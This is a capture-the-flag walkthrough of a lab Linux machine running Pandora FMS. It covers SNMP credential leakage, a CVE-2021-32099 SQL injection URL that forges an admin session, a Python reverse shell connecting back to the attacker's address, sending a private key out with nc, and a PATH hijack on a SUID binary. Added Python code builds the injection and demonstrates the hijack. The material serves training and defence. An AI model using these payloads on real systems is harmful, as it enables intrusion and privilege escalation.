Machine Info
- OS: Linux
- Difficulty: Easy
- Points: 20
- Release: 08 Jan 2022
- IP: 10.10.11.136
Network Scanning
We start with an nmap TCP scan of all ports, which shows only two open services: ssh on 22 and http on 80. Browsing the site on port 80 turns up nothing of interest.
nmap -p- -A -T4 10.10.11.136
Since TCP gave us nothing, we try UDP. The scan returns a number of open/filtered ports, but the interesting one is snmp on 161/udp. The agent speaks SNMPv1, which authenticates with nothing more than a plaintext community string and has no encryption, so anyone who knows (or guesses) the community string can read the whole MIB.
nmap -sU -A -T4 10.10.11.136
Enumeration
nmap's snmp-processes script lists the running processes together with their command-line arguments (the HOST-RESOURCES-MIB hrSWRun tables), and one process carries a credential on its command line: "daniel:HotelBabylon23". The same information can be pulled with snmpwalk.
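The following is an added example (not part of the original writeup) of how to find this kind of leak automatically in snmpwalk output: it joins hrSWRunName and hrSWRunParameters by process index and flags arguments that look like a password. The sample output, the process name and the PIDs are constructed for the example; only the credential is the one from the box. The secret regex is a heuristic, so review its hits by hand.

```python
import re

# Constructed sample of `snmpwalk -v1 -c <community> <host> HOST-RESOURCES-MIB::hrSWRun`
# output. hrSWRunName is 1.3.6.1.2.1.25.4.2.1.2 and hrSWRunParameters is
# 1.3.6.1.2.1.25.4.2.1.5; nmap's snmp-processes script reads the same tables.
SAMPLE_WALK = """\
HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "systemd"
HOST-RESOURCES-MIB::hrSWRunName.612 = STRING: "sshd"
HOST-RESOURCES-MIB::hrSWRunName.912 = STRING: "host_check"
HOST-RESOURCES-MIB::hrSWRunName.1033 = STRING: "mysqld"
HOST-RESOURCES-MIB::hrSWRunParameters.1 = STRING: ""
HOST-RESOURCES-MIB::hrSWRunParameters.612 = STRING: "-D"
HOST-RESOURCES-MIB::hrSWRunParameters.912 = STRING: "-u daniel -p HotelBabylon23"
HOST-RESOURCES-MIB::hrSWRunParameters.1033 = STRING: "--basedir=/usr"
"""

LINE_RE = re.compile(r'hrSWRun(Name|Parameters)\.(\d+) = STRING: "(.*)"$')

# Argument shapes that commonly carry a secret on a command line (heuristic).
SECRET_RE = re.compile(
    r'(?:(?:^|\s)-p\s*(\S+))'                                # -p secret / -psecret
    r'|(?:--?pass(?:word)?(?:=|\s+)(\S+))'                    # --password=secret
    r'|(?:(?:^|\s)\w*(?:pass|pwd|secret|token)\w*=(\S+))',    # DB_PASSWORD=secret
    re.IGNORECASE,
)


def parse_processes(walk: str) -> dict:
    """Return {pid: {"name": ..., "params": ...}} from snmpwalk output."""
    procs = {}
    for line in walk.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        column, pid, value = m.group(1), int(m.group(2)), m.group(3)
        entry = procs.setdefault(pid, {"name": "", "params": ""})
        entry["name" if column == "Name" else "params"] = value
    return procs


def find_secrets(walk: str) -> list:
    """List (pid, name, params, secret) for every process whose arguments match SECRET_RE."""
    hits = []
    for pid, proc in sorted(parse_processes(walk).items()):
        m = SECRET_RE.search(proc["params"])
        if m:
            secret = next(g for g in m.groups() if g)
            hits.append((pid, proc["name"], proc["params"], secret))
    return hits


if __name__ == "__main__":
    for pid, name, params, secret in find_secrets(SAMPLE_WALK):
        print(f"pid {pid} ({name}): {params!r} -> secret {secret!r}")
```

Anything readable over SNMPv1 with a guessable community string is readable by everyone on the network, so process arguments, like the one above, should never carry passwords; use a config file with restrictive permissions or an environment variable instead.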
Exploitation
The credential is valid for SSH:
ssh daniel@panda.htb
Looking for other accounts on the system (/etc/passwd, /home), we find a user "matt". The user flag belongs to him, so we need to move to that account.
Privilege Escalation
User Matt
Running linpeas as daniel shows a second web site bound to 127.0.0.1:80 on the box, separate from the one we saw from outside. To reach it we forward a local port to it over SSH. Note that binding local port 80 requires root on the attacking machine; any high port works just as well, as long as the URLs below are adjusted accordingly.
ssh -L 80:127.0.0.1:80 daniel@panda.htb
The internal site is Pandora FMS v7.0NG.742. "daniel:HotelBabylon23" does not log in here. This version is affected by CVE-2021-32099, an unauthenticated SQL injection in the session_id parameter of include/chart_generator.php; the blog post linked as CVE-2021-32099 explains how it yields an admin session and CVE-2021-32099_Payload is the request used. The injected UNION returns a row we control whose data column is PHP session data setting id_usuario to admin, so the application treats our request as the admin user:
http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO
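To show why the payload has exactly this shape, here is an added example (not code from the original post or from Pandora FMS) that builds the same request: it serializes a dict the way PHP's default session handler stores $_SESSION (key|value pairs, with the byte length in the s: prefix), wraps it in the UNION and URL-encodes it so that it matches the URL above character for character. The decoder is a minimal inverse used only to check that a payload round-trips; the trailing "SgGO" is an arbitrary token after the "-- " comment and the base URL is the page's forwarded address.

```python
from urllib.parse import quote

BASE = "http://127.0.0.1/pandora_console/include/chart_generator.php"

# The request shown on the page, used below to check that we rebuild it exactly.
PAGE_URL = (BASE + "?session_id="
            "%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO")


def php_session_encode(fields: dict) -> str:
    """Encode a dict as PHP's default session format: key|<serialized value> concatenated.
    ASCII strings only: PHP counts bytes in s:<len>, and a wrong length makes
    session_decode() reject the whole blob."""
    out = []
    for key, value in fields.items():
        if isinstance(value, bool):
            ser = f"b:{int(value)};"
        elif isinstance(value, int):
            ser = f"i:{value};"
        elif value is None:
            ser = "N;"
        elif isinstance(value, str):
            value.encode("ascii")  # raise rather than emit a wrong byte length
            ser = f's:{len(value)}:"{value}";'
        else:
            raise TypeError(f"unsupported type for session key {key!r}")
        out.append(f"{key}|{ser}")
    return "".join(out)


def php_session_decode(data: str) -> dict:
    """Minimal inverse of php_session_encode (s, i, b and N only)."""
    fields, i = {}, 0
    while i < len(data):
        bar = data.index("|", i)
        key, i = data[i:bar], bar + 1
        tag = data[i]
        if tag == "s":
            len_end = data.index(":", i + 2)
            length = int(data[i + 2:len_end])
            start = len_end + 2                  # skip :"
            fields[key] = data[start:start + length]
            i = start + length + 2               # skip ";
        elif tag in "ib":
            end = data.index(";", i)
            num = int(data[i + 2:end])
            fields[key] = bool(num) if tag == "b" else num
            i = end + 1
        elif tag == "N":
            fields[key], i = None, i + 2
        else:
            raise ValueError(f"unsupported serialized type {tag!r}")
    return fields


def build_injection(session: dict, comment_tail: str = "SgGO") -> str:
    """The vulnerable query looks a session row up by session_id. Closing the
    string and UNIONing a row we control makes the column the application
    reads back as session data carry our serialized $_SESSION."""
    return f"' union SELECT 1,2,'{php_session_encode(session)}' as data -- {comment_tail}"


def build_url(session: dict, base: str = BASE) -> str:
    # Percent-encode like a browser; , | : ; stay literal as in the page's URL.
    return base + "?session_id=" + quote(build_injection(session), safe=",|:;")


if __name__ == "__main__":
    url = build_url({"id_usuario": "admin"})
    print(url)
    print("matches the page's request:", url == PAGE_URL)
```

The fix Pandora shipped is to stop interpolating session_id into the query; on the attacker's side the practical lesson is that any session store backed by SQL and readable through an injection can be turned into an impersonation primitive, because the serialized blob is trusted as-is once it comes back from the database.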
With admin access we tried to upload a shell or backdoor through the console ourselves but did not manage it, so we used the public exploit script linked as CVE-2021-32099 Pandora_v7.0NG.742 (sqlpwn.py), which automates the injection and gives us a shell on the box. From that shell we spawn a Python reverse shell back to a listener on our machine (10.10.16.13 is our VPN address), upgrade it to a fully interactive shell and read the user flag.
# on the attacking machine: run the exploit against the forwarded port
./sqlpwn.py -t 127.0.0.1
# on the attacking machine: listener for the reverse shell
nc -nlvp 4444
# inside the shell sqlpwn.py gives us: connect back to our listener
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.13",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Root
Running linpeas again, this time as matt, reveals a SUID binary called "pandora_backup". We copy it to our machine and investigate it; strings shows that it invokes tar by name rather than by absolute path, so the lookup goes through whatever $PATH the caller supplies. We can therefore create our own tar and prepend its directory to $PATH.
strings pandora_backup
Trying this from the reverse shell does not work: the shell we got through the web application runs in an environment where the SUID bit has no effect (a process tree started under systemd's NoNewPrivileges, for example, cannot gain privileges through setuid executables). So we generate an SSH key pair for matt and log in over SSH instead, which gives us a clean login environment. A tidier variant is to generate the pair on the attacking machine and append only id_rsa.pub to matt's authorized_keys, so no private key crosses the wire in clear.
#On local machine: start the listener first so the key has somewhere to go
nc -nlvp 9999 > id_rsa
#On victim machine, as matt: accept the defaults (writes ~/.ssh/id_rsa and id_rsa.pub)
ssh-keygen
cd /home/matt/.ssh
cat id_rsa.pub > authorized_keys
chmod 600 authorized_keys
nc 10.10.16.13 9999 < id_rsa
#On local machine: ssh refuses keys that are readable by others
chmod 600 id_rsa
ssh matt@panda.htb -i id_rsa
Now we create a fake tar in /tmp that simply starts bash, prepend /tmp to $PATH and run pandora_backup; the binary's tar lookup hits our file first and the shell runs with root as effective uid. Should bash drop the elevated effective uid (it does so when real and effective uid differ), write "/bin/bash -p" into the fake tar instead, which keeps it.
cd /tmp
# a "tar" that just starts a shell (no shebang needed: sh runs it as a script)
echo '/bin/bash' > tar
chmod +x tar
# our directory is searched before the real tar's
export PATH=/tmp:$PATH
# run the SUID binary (use its full path if it is not in the current directory)
./pandora_backup
id
cd /root
cat root.txt
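The PATH hijack above, as an added example that is not part of the original writeup or of Pandora FMS: it plants a fake tar in a temporary directory, models the vulnerable pattern (a privileged program calling system("tar ...") with the caller's PATH inherited) and shows which binary gets executed, next to a hardened lookup that ignores the caller's PATH. There is no real setuid here, since that would need root to set up; the fake tar only prints a marker instead of starting a shell, and the temporary directory stands in for /tmp.

```python
import os
import shutil
import subprocess
import tempfile

# Stand-in for the page's /tmp/tar: prints a marker instead of spawning bash.
FAKE_TAR = "#!/bin/sh\necho HIJACKED\n"


def plant_fake_tar(directory: str) -> str:
    """Write an executable named tar into directory, as the attacker does in /tmp."""
    path = os.path.join(directory, "tar")
    with open(path, "w") as f:
        f.write(FAKE_TAR)
    os.chmod(path, 0o755)
    return path


def resolve(command: str, path_env: str):
    """The file a shell would run for `command` under the given PATH (None if absent)."""
    return shutil.which(command, path=path_env)


def run_like_pandora_backup(path_env: str) -> str:
    """Model of the vulnerable pattern: system("tar ...") with the caller's PATH.
    Whatever tar is found first in PATH runs, here with the caller's uid;
    in the real binary it would run with root as effective uid."""
    proc = subprocess.run("tar --version", shell=True, env={"PATH": path_env},
                          capture_output=True, text=True)
    return proc.stdout.strip()


def run_hardened(caller_path: str) -> str:
    """Hardened lookup: the caller's PATH is deliberately ignored and tar is
    resolved only from a fixed, root-owned set of directories (the same
    effect as calling /usr/bin/tar by absolute path)."""
    fixed = "/usr/bin:/bin"
    return resolve("tar", fixed) or "tar not installed in /usr/bin or /bin"


def demo() -> dict:
    tmp = tempfile.mkdtemp(prefix="hijack-")
    try:
        plant_fake_tar(tmp)
        # export PATH=/tmp:$PATH, with our temporary directory in place of /tmp
        attacker_path = tmp + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin")
        return {
            "tmpdir": tmp,
            "vulnerable_resolves": resolve("tar", attacker_path),
            "vulnerable_output": run_like_pandora_backup(attacker_path),
            "hardened_resolves": run_hardened(attacker_path),
        }
    finally:
        shutil.rmtree(tmp, ignore_errors=True)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The same check is worth running on any SUID binary found during enumeration: strings that name a program without a leading slash, or a PATH= that includes a world-writable directory, are the signature of this bug. The fix on the defending side is an absolute path (or a PATH reset to root-owned directories before system()/execvp()), and, for a setuid program that must call bash, dropping to the real uid first.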